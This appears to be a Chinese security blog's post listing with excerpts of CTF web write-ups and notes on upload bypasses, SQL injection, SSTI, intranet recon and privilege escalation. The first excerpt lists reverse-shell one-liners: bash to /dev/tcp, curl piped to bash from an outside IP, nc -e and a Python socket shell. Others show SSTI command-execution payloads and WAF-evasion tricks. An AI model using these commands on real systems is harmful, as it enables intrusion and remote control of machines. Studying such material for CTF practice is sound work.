自定义博客皮肤VIP专享

*博客头图:

格式为PNG、JPG,宽度*高度大于1920*100像素,不超过2MB,主视觉建议放在右侧,请参照线上博客头图

请上传大于1920*100像素的图片!

博客底图:

图片格式为PNG、JPG,不超过1MB,可上下左右平铺至整个背景

栏目图:

图片格式为PNG、JPG,图片宽度*高度为300*38像素,不超过0.5MB

主标题颜色:

RGB颜色,例如:#AFAFAF

Hover:

RGB颜色,例如:#AFAFAF

副标题颜色:

RGB颜色,例如:#AFAFAF

自定义博客皮肤

-+
  • 博客(24)
  • 收藏
  • 关注

原创 shell反弹记录

bash -i >& /dev/tcp/ip/port 0>&1bash -i >& /dev/tcp/192.168.20.151/7777 0>&1curl http://174.1.73.154/shell.txt|bashnc -e /bin/sh ip portpython -c "import os,socket,subprocess;s=socket.socket(socket.AF_INET,socket.SOCK_STRE

2020-12-25 16:26:28 275

原创 文件上传奇淫技巧

可用于绕过安全狗4.0大致思路呢,就是考虑到安全狗在检测的时候,是正则常规request包,但是apache处理request包的时候有容错,这就造成了差异性,安全狗就会提取不出应该提取的部分,从而绕过文件名回车绕过:==绕过双写filename=;(诡异的request包)%00截断在文件名后面加上%00然后CTRL+SHIFT+U转成字符,这里后面不用加.jpg也可以...

2020-12-25 16:21:14 208

原创 文件上传总结

客户端javascript校验禁用js,抓包等服务端校验文件头content-type字段校验image/gif文件内容头校验.JPEG;.JPE;.JPG,”JPGGraphic File”.gif,”GIF 89A”.zip,”Zip Compressed”.doc;.xls;.xlt;.ppt;.apr,”MS Compound Document v1 or Lotus Approach APRfile”文件名检测后缀名白名单校验配合文件解析漏洞配合文件包含漏洞长文件名

2020-12-25 16:19:11 208

原创 sql注入绕过总结

2020-12-22 17:08:48 497

原创 [NPUCTF2020]ezinclude

进入页面发现需要传入name和pass,源代码发现hint疑似MD5哈希长度拓展攻击,在响应包里面给出啦pass的值得到了 flflflflag.php ,访问重定向到了其他页面,抓包抓回来,页面提示 include($_GET[“file”]) ,扫目录可以得到 dir.php ,包含他可以看到这个页面列出了 /tmp 下的所有文件这里考察的是PHP临时文件包含,其基本是两种情况:利用能访问的phpinfo页面,对其一次发送大量数据造成临时文件没有及时被删除PHP版本<7.2,利用ph

2020-12-09 17:57:00 1648

原创 内网信息收集

本机信息收集1.查询账户信息:对当前主机的用户角色和用户权限做了解,判断是否需要进一步提升权限。 win:whoami、net user 用户名 linux:whoami、id、cat /etc/shadow、cat /etc/passwd2.查询网络和端口信息根据目的主机的IP地址/网络连接/相关网络地址,确认所连接的网络情况。win:ipconfig、netstat -ano ARP表:arp -a 路由表: route print

2020-12-06 11:57:07 203

原创 [CISCN2019 华东南赛区]Double Secret

页面比较简陋扫目录扫出一个secret目录在url加上secret参数,发现被加密随意输入一些他报错了~。我们发现了关键处的代码这里的加密算法使用的是RC4,密钥泄漏了。将所发送内容解密之后会被渲染,因此考虑到可能存在模版注入。在网上找了一个RC4加密脚本,再次基础上输入密钥并尝试文件读取。import base64from urllib.parse import quotedef rc4_main(key = "init_key", message = "init_message"):

2020-11-28 16:15:38 355

原创 [b01lers2020]Welcome to Earth

一直自动跳转/die/页面,抓包尝试查看chase目录后面就一路找,但是没找到什么有用的信息看了wp才知道,关键点在js文件中/static/js/door.js最后来到static/js/fight.js重新排序flag即可from itertools import permutationsflag = ["{hey", "_boy", "aaaa", "s_im", "ck!}", "_baa", "aaaa", "pctf"]item = permutations(flag)f

2020-11-28 16:04:53 890

原创 [CSCCTF 2019 Qual]FlaskLight

考点:ssti注入 flask模板根据题目等提示是flask模板,测试一下获取所有的类可以看到很多类,寻找那些可以包含文件或者命令执行的类例如 file、popen等例一:warnings.catch_warnings类{{[].__class__.__base__.__subclasses__()[59].__init__['__glo'+'bals__']['__builtins__']['eval']("__import__('os').popen('ls').read()")}}

2020-11-28 12:01:11 227

原创 [BJDCTF 2nd]文件探测

查看包头访问home.php,查看urlhttp://4ab7acda-aefd-434e-9e66-647331d51676.node3.buuoj.cn/home.php?file=system可能存在文件包含漏洞,使用php伪协议尝试获取源代码源码:<?phpsetcookie("y1ng", sha1(md5('y1ng')), time() + 3600);setcookie('your_ip_address', md5($_SERVER['REMOTE_ADDR']),

2020-11-27 16:39:15 245

原创 [GKCTF2020]EZ三剑客-EzWeb

考点ssrf redis反弹shell打开网站,查看源代码查看文件访问下ip经过测试是ssrf漏洞使用burp爆破内网ip

2020-11-27 13:12:50 514

原创 [GXYCTF2019]BabysqliV3.0 [phar]

打开题目是登录界面,使用burp爆破出密码是password登录上传文件,以及url里有拼接file参数,可能有文件包含漏洞使用php伪协议获取upload源码<meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <form action="" method="post" enctype="multipart/form-data"> 上传文件 <input type="fil

2020-11-25 17:01:30 1460

原创 ctfshow 红包题第九弹 ssrf

通过抓包登陆界面,发现存在ssrf漏洞在通过ps猜测是ssrf打mysql使用gopherus工具生成ssrf打mysql 的payload之后放到burp中把参数在url编码一次查看是否成功写入文件成功写入,使用蚁剑连接

2020-11-25 13:55:49 1023

原创 ctfshow Login_Only_For_36D

在源代码中可以看到sql语句因为过滤了’ 等使用regexp注入脚本import requestsimport time as turl ="http://92c75efe-44ec-4055-8ca8-89aaf5eee173.chall.ctf.show/"k = "0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ"flag = ""data = { 'username':'admin\\',

2020-11-21 16:13:46 665 1

原创 [GYCTF2020] Ezsqli

考点:盲注 + 无列名注入使用异或注入发现页面回显不一样进一步判断接下来开始获取列名,但是因为or被过滤使用sys.x$schema_flattened_keys绕过使用脚本获取表名import requestsurl = "http://9c35ab79-5056-4de1-87fe-0418ebc00b82.node3.buuoj.cn/index.php"flag = ""payload = "1^(ascii(substr((select group_concat(tab

2020-11-21 12:08:37 458

原创 docker学习笔记

docker学习搜索镜像: docker search 要搜索的镜像 例子: docker search redis拉取镜像: doucker pull 要下载的镜像:标签(如果不写,默认为latest) 例子: docker pull ubuntu查看当前镜像列表: docker images # 查看当前镜像列表 运行容器: 例子: docker run -it ubuntu /bin/bash 参数: -i: 交互式操作。 -t: 终端

2020-10-08 18:27:20 69

原创 正则绕过总结

换行符绕过(%0a)<?phpinclude("flag.php");highlight_file(__FILE__);$c = $_GET['c'];if (preg_match('/^flag$/i', $c) && $c !== 'flag') { echo $flag;}else{ echo "nonono";}2.数组绕过preg_match只能处理字符串,当传入的subject是数组时会返回false3.%5c绕过<?ph.

2020-09-28 11:16:47 7723 2

原创 Windows提权——收集

提权辅助网站:1.https://bugs.hacking8.com/tiquan/将补丁号或systeminfo信息复制到文本栏即可2.https://github.com/Al1ex/Heptagram/tree/master/Windows/Elevationwindwos提权类脚本

2020-09-26 10:18:55 162

原创 windows提权(一)

内核漏洞提权#查看本地系统补丁systeminfo |findstr "KB"wmic qfe get Caption,Description,HotFixID,InstalledOn#另外两种远程查询的方式需要结合其他远程执行方式,例如 wmic远程,schtasks远程、dcom远程等等,还有一些笔者不知到远程执行方式。wmic qfe get Caption,Description,HotFixID,InstalledOn |findstr /C:"KB3143141"得到补丁号可以使用

2020-09-24 19:07:08 253

原创 Linix提权(一)

SUID 提权什么是suid?suid全称是Set owner User ID up on execution。这是Linux给可执行文件的一个属性。通俗的理解为其他用户执行这个程序的时候可以用该程序所有者/组的权限。需要注意的是,只有程序的所有者是0号或其他super user,同时拥有suid权限,才可以提权。常见的可用来提权的Linux 可执行文件有:Nmap, Vim, find, bash, more, less, nano, cp查看可以suid 提权的可执行文件find / -pe

2020-09-23 18:24:02 953

原创 [HFCTF2020]BabyUpload

[HFCTF2020]BabyUpload题目直接给了源代码<?phperror_reporting(0);session_save_path("/var/babyctf/");session_start();require_once "/flag";highlight_file(__FILE__);if($_SESSION['username'] ==='admin'){ $filename='/var/babyctf/success.txt'; if(file_e

2020-08-06 11:27:56 1100

原创 [安洵杯 2019]easy_web

[安洵杯 2019]easy_web考点:MD5强类型绕过,命令注入绕过进入发现img参数可能有任意文件下载通过2次base64解密和一次hex转字符串得到555.png再通过相同的方式获取到了index.php的源码<?phperror_reporting(E_ALL || ~ E_NOTICE);header('content-type:text/html;charset=utf-8');$cmd = $_GET['cmd'];if (!isset($_GET['img'])

2020-05-30 08:39:39 614

转载 buuctf web [BJDCTF2020]EzPHP

进入后是这样的查看源代码发现注释base32解码得到1nD3x.php,发现是源码 <?phphighlight_file(__FILE__);error_reporting(0); $file = "1nD3x.php";$shana = $_GET['shana'];$passwd = $_GET['passwd'];$arg = '';$code = '';e...

2020-03-12 09:01:07 2828

原创 buuctf web [CISCN2019 华东南赛区]Web11

buuctf web [CISCN2019 华东南赛区]Web11进入后页面是这样的可以通过最低端发现是Smarty SSTI,又从右上角得知是通过ip注入使用burp构造X-Forwarded-For开始注入从返回14看出确实存在注入,接下来根据smarty手册返回版本号等最后读取flag...

2020-03-11 08:18:56 693

空空如也

空空如也

TA创建的收藏夹 TA关注的收藏夹

TA关注的人

提示
确定要删除当前文章?
取消 删除